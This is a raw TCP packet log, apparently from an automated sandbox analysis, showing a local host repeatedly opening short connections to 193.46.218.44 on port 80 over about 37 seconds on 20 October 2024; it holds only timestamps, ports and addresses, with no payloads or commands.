Oct 20, 2024 22:47:13.013921022 CEST	49730	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:13.013966084 CEST	49730	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:13.019020081 CEST	80	49730	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:13.019077063 CEST	80	49730	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:14.177489042 CEST	80	49730	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:14.177580118 CEST	49730	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:14.178319931 CEST	49730	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:14.183254004 CEST	80	49730	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:14.284198999 CEST	49731	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:14.289330959 CEST	80	49731	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:14.289437056 CEST	49731	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:14.289542913 CEST	49731	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:14.289577007 CEST	49731	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:14.295145988 CEST	80	49731	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:14.295175076 CEST	80	49731	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:15.460536003 CEST	80	49731	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:15.460619926 CEST	49731	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:15.460731983 CEST	49731	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:15.465740919 CEST	80	49731	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:15.571489096 CEST	49732	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:15.576558113 CEST	80	49732	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:15.576675892 CEST	49732	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:15.576843023 CEST	49732	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:15.576879025 CEST	49732	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:15.581727982 CEST	80	49732	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:15.581757069 CEST	80	49732	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:16.939410925 CEST	80	49732	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:16.939729929 CEST	49732	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:16.939824104 CEST	49732	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:16.944751024 CEST	80	49732	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:17.049551964 CEST	49733	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:17.054526091 CEST	80	49733	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:17.054630995 CEST	49733	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:17.054780960 CEST	49733	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:17.054819107 CEST	49733	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:17.059693098 CEST	80	49733	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:17.059745073 CEST	80	49733	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:18.231237888 CEST	80	49733	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:18.231590986 CEST	49733	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:18.231719971 CEST	49733	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:18.236607075 CEST	80	49733	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:18.346646070 CEST	49734	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:18.351573944 CEST	80	49734	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:18.351700068 CEST	49734	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:18.351844072 CEST	49734	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:18.351876974 CEST	49734	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:18.356740952 CEST	80	49734	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:18.356817007 CEST	80	49734	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:19.483194113 CEST	80	49734	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:19.483269930 CEST	49734	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:19.483381033 CEST	49734	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:19.488276005 CEST	80	49734	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:19.596676111 CEST	49735	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:19.601881981 CEST	80	49735	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:19.602010012 CEST	49735	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:19.602190018 CEST	49735	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:19.602190971 CEST	49735	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:19.607407093 CEST	80	49735	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:19.607438087 CEST	80	49735	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:20.739562988 CEST	80	49735	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:20.739675999 CEST	49735	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:20.739765882 CEST	49735	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:20.744714975 CEST	80	49735	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:20.847619057 CEST	49737	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:20.852626085 CEST	80	49737	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:20.853075027 CEST	49737	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:20.853209019 CEST	49737	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:20.853241920 CEST	49737	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:20.858104944 CEST	80	49737	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:20.858212948 CEST	80	49737	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:21.988152027 CEST	80	49737	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:21.988846064 CEST	49737	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:21.988913059 CEST	49737	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:21.994224072 CEST	80	49737	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:22.096697092 CEST	49739	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:22.101867914 CEST	80	49739	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:22.103450060 CEST	49739	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:22.103779078 CEST	49739	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:22.103831053 CEST	49739	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:22.110601902 CEST	80	49739	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:22.110631943 CEST	80	49739	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:23.306181908 CEST	80	49739	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:23.306545973 CEST	49739	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:23.306545973 CEST	49739	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:23.311958075 CEST	80	49739	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:23.409040928 CEST	49742	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:23.414057970 CEST	80	49742	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:23.414160967 CEST	49742	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:23.414269924 CEST	49742	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:23.414292097 CEST	49742	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:23.419161081 CEST	80	49742	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:23.419214964 CEST	80	49742	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:24.550820112 CEST	80	49742	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:24.550896883 CEST	49742	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:24.550962925 CEST	49742	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:24.555787086 CEST	80	49742	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:24.660479069 CEST	49744	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:24.665551901 CEST	80	49744	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:24.665688038 CEST	49744	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:24.665781021 CEST	49744	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:24.665817022 CEST	49744	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:24.670622110 CEST	80	49744	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:24.670757055 CEST	80	49744	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:25.813371897 CEST	80	49744	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:25.813529015 CEST	49744	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:25.813694000 CEST	49744	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:25.818511963 CEST	80	49744	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:25.924782038 CEST	49747	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:25.930464983 CEST	80	49747	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:25.931046009 CEST	49747	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:25.931168079 CEST	49747	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:25.931201935 CEST	49747	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:25.936177015 CEST	80	49747	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:25.936207056 CEST	80	49747	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:27.055897951 CEST	80	49747	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:27.056073904 CEST	49747	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:27.056180000 CEST	49747	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:27.060996056 CEST	80	49747	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:27.159543991 CEST	49749	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:27.164585114 CEST	80	49749	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:27.164673090 CEST	49749	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:27.164822102 CEST	49749	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:27.164855957 CEST	49749	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:27.170170069 CEST	80	49749	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:27.170214891 CEST	80	49749	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:28.332674026 CEST	80	49749	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:28.332784891 CEST	49749	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:28.332840919 CEST	49749	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:28.337730885 CEST	80	49749	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:28.439757109 CEST	49751	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:28.444720984 CEST	80	49751	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:28.444818020 CEST	49751	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:28.444948912 CEST	49751	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:28.444983959 CEST	49751	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:28.450050116 CEST	80	49751	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:28.450078964 CEST	80	49751	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:29.573251009 CEST	80	49751	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:29.573331118 CEST	49751	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:29.573398113 CEST	49751	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:29.578407049 CEST	80	49751	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:29.690011978 CEST	49753	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:29.695015907 CEST	80	49753	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:29.695123911 CEST	49753	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:29.695262909 CEST	49753	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:29.695286036 CEST	49753	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:29.700155973 CEST	80	49753	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:29.700185061 CEST	80	49753	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:30.899616003 CEST	80	49753	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:30.899693012 CEST	49753	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:30.899876118 CEST	49753	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:30.904920101 CEST	80	49753	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:31.037241936 CEST	49755	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:31.042211056 CEST	80	49755	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:31.042305946 CEST	49755	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:31.042434931 CEST	49755	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:31.042459965 CEST	49755	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:31.047208071 CEST	80	49755	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:31.047491074 CEST	80	49755	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:32.187431097 CEST	80	49755	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:32.187509060 CEST	49755	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:32.187588930 CEST	49755	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:32.192430019 CEST	80	49755	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:32.299829006 CEST	49757	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:32.304847956 CEST	80	49757	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:32.304936886 CEST	49757	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:32.305058002 CEST	49757	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:32.305087090 CEST	49757	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:32.309906960 CEST	80	49757	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:32.309937000 CEST	80	49757	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:33.815787077 CEST	80	49757	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:33.815826893 CEST	80	49757	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:33.815859079 CEST	49757	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:33.815890074 CEST	49757	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:33.821372032 CEST	49757	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:33.826278925 CEST	80	49757	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:33.924921036 CEST	49758	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:33.932462931 CEST	80	49758	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:33.932578087 CEST	49758	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:33.932708025 CEST	49758	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:33.932729006 CEST	49758	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:33.939049959 CEST	80	49758	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:33.939822912 CEST	80	49758	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:35.074907064 CEST	80	49758	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:35.074960947 CEST	49758	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:35.075031042 CEST	49758	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:35.079830885 CEST	80	49758	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:35.190237045 CEST	49759	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:35.195125103 CEST	80	49759	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:35.195216894 CEST	49759	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:35.195359945 CEST	49759	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:35.195400000 CEST	49759	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:35.200162888 CEST	80	49759	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:35.200442076 CEST	80	49759	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:36.423759937 CEST	80	49759	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:36.423970938 CEST	49759	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:36.424048901 CEST	49759	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:36.431025028 CEST	80	49759	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:36.534487009 CEST	49760	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:36.539436102 CEST	80	49760	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:36.539522886 CEST	49760	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:36.539623022 CEST	49760	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:36.539644003 CEST	49760	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:36.544519901 CEST	80	49760	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:36.544548035 CEST	80	49760	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:37.678072929 CEST	80	49760	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:37.678281069 CEST	49760	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:37.678281069 CEST	49760	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:37.683135986 CEST	80	49760	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:37.784066916 CEST	49761	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:37.789038897 CEST	80	49761	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:37.789129019 CEST	49761	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:37.789249897 CEST	49761	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:37.789277077 CEST	49761	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:37.794056892 CEST	80	49761	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:37.794128895 CEST	80	49761	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:39.227195978 CEST	80	49761	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:39.227335930 CEST	80	49761	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:39.227375984 CEST	49761	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:39.227413893 CEST	49761	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:39.227499962 CEST	49761	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:39.232275009 CEST	80	49761	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:39.331223011 CEST	49762	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:39.336896896 CEST	80	49762	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:39.336971998 CEST	49762	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:39.337126017 CEST	49762	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:39.337151051 CEST	49762	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:39.342001915 CEST	80	49762	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:39.342346907 CEST	80	49762	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:40.622847080 CEST	80	49762	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:40.623126984 CEST	49762	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:40.623126984 CEST	49762	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:40.628079891 CEST	80	49762	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:40.737255096 CEST	49763	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:40.742342949 CEST	80	49763	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:40.742455959 CEST	49763	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:40.742552996 CEST	49763	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:40.742571115 CEST	49763	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:40.747344017 CEST	80	49763	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:40.747504950 CEST	80	49763	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:41.941302061 CEST	80	49763	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:41.941494942 CEST	49763	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:41.941587925 CEST	49763	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:41.946510077 CEST	80	49763	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:42.049920082 CEST	49764	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:42.055118084 CEST	80	49764	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:42.055236101 CEST	49764	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:42.055490971 CEST	49764	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:42.055500984 CEST	49764	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:42.060698986 CEST	80	49764	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:42.060750961 CEST	80	49764	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:43.270080090 CEST	80	49764	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:43.270186901 CEST	49764	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:43.270315886 CEST	49764	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:43.275132895 CEST	80	49764	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:43.377856970 CEST	49765	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:43.382878065 CEST	80	49765	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:43.382998943 CEST	49765	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:43.383141041 CEST	49765	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:43.383177042 CEST	49765	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:43.388262987 CEST	80	49765	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:43.388297081 CEST	80	49765	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:45.480496883 CEST	80	49765	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:45.480537891 CEST	80	49765	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:45.480572939 CEST	80	49765	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:45.480586052 CEST	49765	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:45.480607033 CEST	49765	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:45.480637074 CEST	49765	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:45.480720043 CEST	49765	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:45.481251955 CEST	80	49765	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:45.481317043 CEST	49765	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:45.486273050 CEST	80	49765	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:45.596766949 CEST	49766	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:45.601722956 CEST	80	49766	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:45.601824999 CEST	49766	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:45.601967096 CEST	49766	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:45.602000952 CEST	49766	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:45.606920004 CEST	80	49766	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:45.607327938 CEST	80	49766	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:46.820302010 CEST	80	49766	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:46.820514917 CEST	49766	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:46.838107109 CEST	80	49766	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:46.838177919 CEST	49766	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:48.127964020 CEST	49767	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:48.133111954 CEST	80	49767	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:48.133208990 CEST	49767	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:48.133344889 CEST	49767	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:48.133404016 CEST	49767	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:48.138283014 CEST	80	49767	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:48.138339043 CEST	49767	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:48.138456106 CEST	80	49767	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:48.138564110 CEST	80	49767	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:48.138592005 CEST	80	49767	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:48.138593912 CEST	49767	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:48.138619900 CEST	49767	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:48.138642073 CEST	49767	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:48.138664007 CEST	80	49767	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:48.138689995 CEST	80	49767	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:48.138717890 CEST	49767	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:48.138730049 CEST	49767	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:48.138791084 CEST	80	49767	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:48.138847113 CEST	49767	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:48.138920069 CEST	80	49767	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:48.138946056 CEST	80	49767	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:48.138971090 CEST	49767	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:48.138999939 CEST	49767	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:48.142993927 CEST	80	49767	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:48.143057108 CEST	49767	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:48.143202066 CEST	80	49767	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:48.143253088 CEST	49767	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:48.143428087 CEST	80	49767	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:48.143486977 CEST	49767	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:48.143539906 CEST	80	49767	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:48.143589973 CEST	49767	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:48.143735886 CEST	80	49767	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:48.143764973 CEST	80	49767	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:48.143793106 CEST	49767	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:48.143795967 CEST	80	49767	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:48.143804073 CEST	49767	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:48.143846035 CEST	49767	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:48.184972048 CEST	80	49767	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:48.185050011 CEST	49767	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:48.232841969 CEST	80	49767	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:48.741841078 CEST	80	49767	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:49.619344950 CEST	80	49767	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:49.619457960 CEST	49767	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:49.619532108 CEST	49767	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:49.626840115 CEST	80	49767	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:49.721457005 CEST	49768	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:49.726929903 CEST	80	49768	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:49.727035999 CEST	49768	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:49.727221966 CEST	49768	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:49.727309942 CEST	49768	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:49.732275963 CEST	80	49768	193.46.218.44	192.168.2.4
